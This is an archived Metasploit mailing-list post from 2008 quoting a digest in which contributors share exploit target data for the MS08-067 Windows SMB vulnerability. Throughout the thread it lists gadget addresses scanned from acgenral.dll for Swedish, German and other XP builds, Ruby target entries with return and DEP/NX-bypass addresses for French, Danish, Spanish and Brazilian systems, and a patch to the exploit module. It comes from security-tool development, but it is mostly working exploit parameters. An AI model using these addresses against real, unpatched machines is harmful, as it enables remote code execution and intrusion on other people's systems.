Metasploit mailing list archives
Codes to Swedish XP SP3 and SP2
From: cg667 at telia.com (Christian Gustavsson)
Date: Fri, 31 Oct 2008 20:43:09 +0100
I have not been able to confirm that these are working, just extracted them from the dll according to instructions Swedish XP SP3 [c:\acgenral.dll] 0x597af807 call esi 0x597b14f8 call esi 0x597b153f call esi 0x597b18ab call esi 0x597b18b6 call esi 0x597b2b32 call esi 0x597b2b37 call esi 0x597b2b65 call esi 0x597b2b70 call esi 0x597b2b94 call esi 0x597b2b9a call esi 0x597b2bea call esi 0x597b2bef call esi 0x597b349c call esi 0x597b350c call esi 0x597b5334 call esi 0x597b533b call esi 0x597b53b4 call esi 0x597b53bb call esi 0x597b5a60 call esi 0x597b5a8e call esi 0x597b5add call esi 0x597b5ae2 call esi 0x597b6961 call esi 0x597b6964 call esi 0x597b6967 call esi 0x597b6a08 call esi 0x597b6a44 call esi 0x597b6a54 call esi 0x597b7fef call esi 0x597b7ff9 call esi 0x597b856e call esi 0x597bb04a call esi 0x597bd8c5 call esi 0x597bd8cd call esi 0x597bdaa8 call esi 0x597bdac0 call esi 0x597bdad3 call esi 0x597bdaeb call esi 0x597bdafe call esi 0x597bdb16 call esi 0x597bdb2d call esi 0x597bdb43 call esi 0x597bdb6c call esi 0x597bdc4c call esi 0x597bdc6a call esi 0x597bdc7d call esi 0x597bdc95 call esi 0x597bdcaa call esi 0x597bde42 call esi 0x597bdeaf call esi 0x597be055 call esi 0x597be06a call esi 0x597be0f5 call esi 0x597be105 call esi 0x597c092e call esi 0x597c093c call esi 0x597c1358 call esi 0x597c1375 call esi 0x597c1403 call esi 0x597c1421 call esi 0x597c3830 call esi 0x597c3843 call esi 0x597c387a call esi 0x597c388d call esi 0x597c38c4 call esi 0x597c38d7 call esi 0x597c4f80 call esi 0x597c4fa9 call esi 0x597c4fd2 call esi 0x597c4ffb call esi 0x597c5024 call esi 0x597c504d call esi 0x597c5076 call esi 0x597c509f call esi 0x597c50c8 call esi 0x597c8938 call esi 0x597c896f call esi 0x597c89a2 call esi 0x597c89c5 call esi 0x597cba79 push esi; ret 0x597cbac2 push esi; ret 0x597cbafb push esi; ret 0x597cc9da call esi 0x597cca35 call esi 0x597cd082 call esi 0x597cd093 call esi 0x597cd0a0 call esi 0x597cd0b6 call esi 0x597cd0c7 call esi 0x597ce111 call esi 0x597ce124 call esi 0x597cff23 call esi 0x597d174b call esi 0x597b17c2 6a048d4508506a226aff Swedish XP SP2 [c:\acgenral.dll] 0x597af727 call esi 0x597b1418 call esi 0x597b145f call esi 0x597b17cb call esi 0x597b17d6 call esi 0x597b2a52 call esi 0x597b2a57 call esi 0x597b2a85 call esi 0x597b2a90 call esi 0x597b2ab4 call esi 0x597b2aba call esi 0x597b2b0a call esi 0x597b2b0f call esi 0x597b33b6 call esi 0x597b3426 call esi 0x597b524e call esi 0x597b5255 call esi 0x597b52ce call esi 0x597b52d5 call esi 0x597b597a call esi 0x597b59a8 call esi 0x597b59f7 call esi 0x597b59fc call esi 0x597b687b call esi 0x597b687e call esi 0x597b6881 call esi 0x597b6922 call esi 0x597b695e call esi 0x597b696e call esi 0x597b7ecb call esi 0x597b7ed5 call esi 0x597b844a call esi 0x597baf60 call esi 0x597bd7db call esi 0x597bd7e3 call esi 0x597bd9be call esi 0x597bd9d6 call esi 0x597bd9e9 call esi 0x597bda01 call esi 0x597bda14 call esi 0x597bda2c call esi 0x597bda43 call esi 0x597bda59 call esi 0x597bda82 call esi 0x597bdb62 call esi 0x597bdb80 call esi 0x597bdb93 call esi 0x597bdbab call esi 0x597bdbc0 call esi 0x597bdd58 call esi 0x597bddc5 call esi 0x597bdf6b call esi 0x597bdf80 call esi 0x597be00b call esi 0x597be01b call esi 0x597c1136 call esi 0x597c1153 call esi 0x597c11e1 call esi 0x597c11ff call esi 0x597c3605 call esi 0x597c3618 call esi 0x597c364f call esi 0x597c3662 call esi 0x597c3699 call esi 0x597c36ac call esi 0x597c4d2b call esi 0x597c4d54 call esi 0x597c4d7d call esi 0x597c4da6 call esi 0x597c4dcf call esi 0x597c4df8 call esi 0x597c4e21 call esi 0x597c4e4a call esi 0x597c4e73 call esi 0x597c86e8 call esi 0x597c871f call esi 0x597c8752 call esi 0x597c8775 call esi 0x597cb829 push esi; ret 0x597cb872 push esi; ret 0x597cb8ab push esi; ret 0x597cc78a call esi 0x597cc7e5 call esi 0x597cce32 call esi 0x597cce43 call esi 0x597cce50 call esi 0x597cce66 call esi 0x597cce77 call esi 0x597cdec1 call esi 0x597cded4 call esi 0x597d0fdf call esi 0x597b16e2 6a048d4508506a226aff //C ----- Original Message ----- From: <framework-request at spool.metasploit.com> To: <framework at spool.metasploit.com> Sent: Friday, October 31, 2008 6:00 PM Subject: Framework Digest, Vol 9, Issue 17
Send Framework mailing list submissions to framework at spool.metasploit.com To subscribe or unsubscribe via the World Wide Web, visit http://spool.metasploit.com/mailman/listinfo/framework or, via email, send a message with subject or body 'help' to framework-request at spool.metasploit.com You can reach the person managing the list at framework-owner at spool.metasploit.com When replying, please edit your Subject line so it is more specific than "Re: Contents of Framework digest..." Today's Topics: 1. OPCODES for Windows XP SP2 FRENCH (MS08-067) (Fred C) 2. Re: MS08-067 added to SVN trunk (3.2-testing) (Ramon de Carvalho Valle) 3. Re: MS08-067 added to SVN trunk (3.2-testing) (Ulises2k) 4. Re: MS08-067 added to SVN trunk (3.2-testing) (Ulises2k) 5. MS08-067 Opcodes for WinXP SP2 Danish (MaXe) 6. OPCODES for Windows 2003 SP1 FRENCH (NONX) (MS08-067) (Yannick HAMON) ---------------------------------------------------------------------- Message: 1 Date: Fri, 31 Oct 2008 12:43:51 +0100 From: Fred C <f.charp at laposte.net> Subject: [framework] OPCODES for Windows XP SP2 FRENCH (MS08-067) To: framework at spool.metasploit.com Message-ID: <90636F40-7E07-437B-B365-AC0E04389DE0 at laposte.net> Content-Type: text/plain; charset=US-ASCII; format=flowed Hi all ;) here the MS08-067 OPCODES for Windows XP SP2 (NX), Credit : Yannick.Hamon[at]xmcopartners.com [ 'Windows XP SP2 French (NX)', { 'Ret' => 0x595dce66, 'DisableNX' => 0x595c16e2, 'Scratch' => 0x00020408, } Cheers, Fred ------------------------------ Message: 2 Date: Fri, 31 Oct 2008 09:57:58 -0200 From: Ramon de Carvalho Valle <ramon at risesecurity.org> Subject: Re: [framework] MS08-067 added to SVN trunk (3.2-testing) To: think.pink at gmx.de Cc: framework at spool.metasploit.com Message-ID: <1225454278.6882.0.camel at nebuchadnezzar> Content-Type: text/plain; charset="us-ascii" Hi, Just added Portuguese (Brazil) (NX) SP2/SP3 targets. Best regards, On Fri, 2008-10-31 at 12:41 +0100, think.pink at gmx.de wrote:Hello, here's the output for WinXP (SP2 german). Unfortunately none of the addresses work for me :-( Maybe somebody can check it. bt temp # /msf3/msfpescan -j esi acgenral.dll [acgenral.dll] 0x6fd9f727 call esi 0x6fda1418 call esi 0x6fda145f call esi 0x6fda17cb call esi 0x6fda17d6 call esi 0x6fda2a52 call esi 0x6fda2a57 call esi 0x6fda2a85 call esi 0x6fda2a90 call esi 0x6fda2ab4 call esi 0x6fda2aba call esi 0x6fda2b0a call esi 0x6fda2b0f call esi 0x6fda33b6 call esi 0x6fda3426 call esi 0x6fda524e call esi 0x6fda5255 call esi 0x6fda52ce call esi 0x6fda52d5 call esi 0x6fda597a call esi 0x6fda59a8 call esi 0x6fda59f7 call esi 0x6fda59fc call esi 0x6fda687b call esi 0x6fda687e call esi 0x6fda6881 call esi 0x6fda6922 call esi 0x6fda695e call esi 0x6fda696e call esi 0x6fda7ecb call esi 0x6fda7ed5 call esi 0x6fda844a call esi 0x6fdaaf60 call esi 0x6fdad7db call esi 0x6fdad7e3 call esi 0x6fdad9be call esi 0x6fdad9d6 call esi 0x6fdad9e9 call esi 0x6fdada01 call esi 0x6fdada14 call esi 0x6fdada2c call esi 0x6fdada43 call esi 0x6fdada59 call esi 0x6fdada82 call esi 0x6fdadb62 call esi 0x6fdadb80 call esi 0x6fdadb93 call esi 0x6fdadbab call esi 0x6fdadbc0 call esi 0x6fdadd58 call esi 0x6fdaddc5 call esi 0x6fdadf6b call esi 0x6fdadf80 call esi 0x6fdae00b call esi 0x6fdae01b call esi 0x6fdb1136 call esi 0x6fdb1153 call esi 0x6fdb11e1 call esi 0x6fdb11ff call esi 0x6fdb3605 call esi 0x6fdb3618 call esi 0x6fdb364f call esi 0x6fdb3662 call esi 0x6fdb3699 call esi 0x6fdb36ac call esi 0x6fdb4d2b call esi 0x6fdb4d54 call esi 0x6fdb4d7d call esi 0x6fdb4da6 call esi 0x6fdb4dcf call esi 0x6fdb4df8 call esi 0x6fdb4e21 call esi 0x6fdb4e4a call esi 0x6fdb4e73 call esi 0x6fdb86e8 call esi 0x6fdb871f call esi 0x6fdb8752 call esi 0x6fdb8775 call esi 0x6fdbb829 push esi; ret 0x6fdbb872 push esi; ret 0x6fdbb8ab push esi; ret 0x6fdbc78a call esi 0x6fdbc7e5 call esi 0x6fdbce32 call esi 0x6fdbce43 call esi 0x6fdbce50 call esi 0x6fdbce66 call esi 0x6fdbce77 call esi 0x6fdbdec1 call esi 0x6fdbded4 call esi 0x6fdc0fdf call esi bt temp # /msf3/msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll [acgenral.dll] 0x6fda16e2 6a048d4508506a226aff -------- Original-Nachricht --------Datum: Fri, 31 Oct 2008 00:16:03 -0500 Von: H D Moore <hdm at metasploit.com> An: framework at spool.metasploit.com Betreff: Re: [framework] MS08-067 added to SVN trunk (3.2-testing)New targets: 0 Windows 2000 MS06-040+ (YMMV pre MS06-040) 1 Windows XP SP2 English (NX) 2 Windows XP SP2 Italian (NX) 3 Windows XP SP2 Spanish (NX) 4 Windows XP SP2 Chinese (NX) 5 Windows XP SP3 English (NX) 6 Windows XP SP3 German (NX) 7 Windows 2003 SP0 English (NO NX) 8 Windows 2003 SP2 English (NO NX) 9 Windows 2003 SP2 English (NX) This list incorporates all of the new targets sent in by list members as well as Brett Moore's NX bypass method for Windows 2003 SP2 and Antoine's Windows 2000 near-universal. Thanks again and please send in the ret/nx addresses for any of the missing targets (SP3 chinese,spanish,italian), (SP2 german). -HD _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework-------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://spool.metasploit.com/pipermail/framework/attachments/20081031/260a0dfd/attachment-0001.pgp ------------------------------ Message: 3 Date: Fri, 31 Oct 2008 09:36:25 -0200 From: Ulises2k <ulises2k at gmail.com> Subject: Re: [framework] MS08-067 added to SVN trunk (3.2-testing) To: "H D Moore" <hdm at metasploit.com> Cc: framework at spool.metasploit.com Message-ID: <7796e5190810310436n525237b0m347720eefc2942df at mail.gmail.com> Content-Type: text/plain; charset=ISO-8859-1 I'm sorry, but my patch is for Windows XP SP3 Spanish. Remember this mail:? http://spool.metasploit.com/pipermail/framework/2008-October/003724.html I send you my patch for svn rev. 5814 Thank you --- ms08_067_netapi.rb 2008-10-31 09:27:22.000000000 -0200 +++ ms08_067_netapi.rb.new 2008-10-31 09:26:48.000000000 -0200 @@ -115,18 +115,6 @@ 'Scratch' => 0x00020408, } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - - # - # Metasploit's NX bypass for XP SP2/SP3 - # Target provided by Ulises2k <ulises2k[at]gmail.com> - # - [ 'Windows XP SP2 Spanish (NX)', - { - 'Ret' => 0x6fdbf807, - 'DisableNX' => 0x6fdc17c2, - 'Scratch' => 0x00020408, - } - ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL # # Metasploit's NX bypass for XP SP2/SP3 @@ -162,7 +150,19 @@ 'Scratch' => 0x00020408, } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL - + + # + # Metasploit's NX bypass for XP SP3 + # Target provided by Ulises2k <ulises2k[at]gmail.com> + # + [ 'Windows XP SP3 Spanish (NX)', + { + 'Ret' => 0x6fdbf807, + 'DisableNX' => 0x6fdc17c2, + 'Scratch' => 0x00020408, + } + ], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL + # # Standard return-to-ESI without NX bypass # -- Ulises U. Cu?? Web: http://www.ulises2k.com.ar On Fri, Oct 31, 2008 at 03:16, H D Moore <hdm at metasploit.com> wrote:New targets: 0 Windows 2000 MS06-040+ (YMMV pre MS06-040) 1 Windows XP SP2 English (NX) 2 Windows XP SP2 Italian (NX) 3 Windows XP SP2 Spanish (NX) 4 Windows XP SP2 Chinese (NX) 5 Windows XP SP3 English (NX) 6 Windows XP SP3 German (NX) 7 Windows 2003 SP0 English (NO NX) 8 Windows 2003 SP2 English (NO NX) 9 Windows 2003 SP2 English (NX) This list incorporates all of the new targets sent in by list members as well as Brett Moore's NX bypass method for Windows 2003 SP2 and Antoine's Windows 2000 near-universal. Thanks again and please send in the ret/nx addresses for any of the missing targets (SP3 chinese,spanish,italian), (SP2 german). -HD _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework------------------------------ Message: 4 Date: Fri, 31 Oct 2008 09:38:21 -0200 From: Ulises2k <ulises2k at gmail.com> Subject: Re: [framework] MS08-067 added to SVN trunk (3.2-testing) To: "H D Moore" <hdm at metasploit.com> Cc: framework at spool.metasploit.com Message-ID: <7796e5190810310438r35430004l38c3e83e2da86533 at mail.gmail.com> Content-Type: text/plain; charset="iso-8859-1" I'm sorry, but my patch is for Windows XP SP3 Spanish. Remember this mail:? http://spool.metasploit.com/pipermail/framework/2008-October/003724.html I send you my patch for svn rev. 5814 Thank you -- Ulises U. Cu?? Web: http://www.ulises2k.com.ar On Fri, Oct 31, 2008 at 03:16, H D Moore <hdm at metasploit.com> wrote:New targets: 0 Windows 2000 MS06-040+ (YMMV pre MS06-040) 1 Windows XP SP2 English (NX) 2 Windows XP SP2 Italian (NX) 3 Windows XP SP2 Spanish (NX) 4 Windows XP SP2 Chinese (NX) 5 Windows XP SP3 English (NX) 6 Windows XP SP3 German (NX) 7 Windows 2003 SP0 English (NO NX) 8 Windows 2003 SP2 English (NO NX) 9 Windows 2003 SP2 English (NX) This list incorporates all of the new targets sent in by list members as well as Brett Moore's NX bypass method for Windows 2003 SP2 and Antoine's Windows 2000 near-universal. Thanks again and please send in the ret/nx addresses for any of the missing targets (SP3 chinese,spanish,italian), (SP2 german). -HD _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework-------------- next part -------------- A non-text attachment was scrubbed... Name: ms08_067_netapi.rb.patch Type: text/x-diff Size: 1239 bytes Desc: not available Url : http://spool.metasploit.com/pipermail/framework/attachments/20081031/a02bbbc4/attachment-0001.bin ------------------------------ Message: 5 Date: Fri, 31 Oct 2008 16:08:26 +0100 From: MaXe <metafan at intern0t.net> Subject: [framework] MS08-067 Opcodes for WinXP SP2 Danish To: framework at spool.metasploit.com Message-ID: <490B1F6A.4090603 at intern0t.net> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Hello there, Here's the addresses for Windows XP (Pro) SP2 Danish (i haven't been able to get SP3, yet: [ 'Windows XP SP2 Danish (DEP)', { 'Ret' => 0x5978f727, 'DisableNX' => 0x597916e2, 'Scratch' => 0x00020408, } ], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL I have also been trying to figure out how to reply to mails/threads sent to the list, but somehow i'm a big noob at using mailman and i have even tried google'ing to find out how to reply to a mail-thread without luck, so i would be thankful if anyone could tell me how to do that. (I only know how to sent new threads to the list) ~ MaXe # ------------------------------ Message: 6 Date: Fri, 31 Oct 2008 17:18:43 +0100 From: Yannick HAMON <yannick.hamon at xmcopartners.com> Subject: [framework] OPCODES for Windows 2003 SP1 FRENCH (NONX) (MS08-067) To: framework at spool.metasploit.com Message-ID: <BE02971C-982E-4866-80AB-1B2B4DC7035E at xmcopartners.com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Hi, Here OPCODES FOR Windows 2003 SP1 (NO NX) # # Standard return-to-ESI without NX bypass # [ 'Windows 2003 SP1 French (NO NX)', { 'Ret' => 0x71ac30ed, 'Scratch' => 0x00020408, } ], # JMP ESI WS2HELP.DLL -- Yannick Hamon - Xmco Partners Consultant S?curit? / Tests d'intrusion Web : http://www.xmcopartners.com ------------------------------ _______________________________________________ Framework mailing list Framework at spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework End of Framework Digest, Vol 9, Issue 17 **************************************** __________ Information from ESET NOD32 Antivirus, version of virus signature database 3571 (20081030) __________ The message was checked by ESET NOD32 Antivirus. http://www.eset.com
Current thread:
- Codes to Swedish XP SP3 and SP2 Christian Gustavsson (Oct 31)